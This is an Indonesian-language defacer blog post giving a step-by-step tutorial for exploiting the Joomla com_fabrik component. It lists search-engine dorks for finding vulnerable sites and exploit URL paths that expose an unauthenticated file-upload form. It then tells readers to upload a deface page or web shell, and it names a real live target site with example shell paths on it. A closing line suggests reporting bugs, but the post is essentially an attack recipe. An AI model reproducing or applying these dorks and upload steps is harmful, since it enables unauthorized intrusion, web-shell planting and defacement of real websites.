Assalamualaikum wr.wb:D
Bismillahhirrohmaanirrohim:)
Hello Defacer!!!
Ketemu ama X-5L0W, Nah kali ini Gue cuma mau brbagi tentang salah satu Exploit Joomla(salah satu Bug/Celah pada CMS Joomla).
Yupz, Tutorial Deface CMS Joomla dengan Exploit Com_Fabrik.
Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Fabrik di CMS Joomla.
Iseng2 buka folder lama, eh nemu file txt yg berisi webtarget vuln, pas di coba ada 1 web nih yg masih vuln com_fabrik, haha yowes gua bikin bahan utk tutorial artikel diBlog ini aja. Berharap ada agan yg bisa ngembangin Dork Freshnya, dan Teknik ini bisa mengemparkan dunia persilatan di Jones-H lagi akwkwak >.<" . *curhatan mengenang masalalu :'D
- Let's Play with me Baby ;*
Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)
Exploit:
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Live target: http://www.mentormanagement.dk
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. Vulnerability ~ Muncul Form Upload seperti gambar di bawah ini
4. Upload sc deface kalian/shell, Lalu Klik Import CSV
Shell/File Akses: /media/namafileagan
contoh: http://www.mentormanagement.dk/media/shell.php atau http://www.mentormanagement.dk/media/index.html
taraaaaa:v
Note:kalo mau nebas index (JANGAN LUPA DI BACK UP JWANCOK :)
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela
Thanks:Society Cyber Squad and All member SCS:D
Tidak ada komentar:
Posting Komentar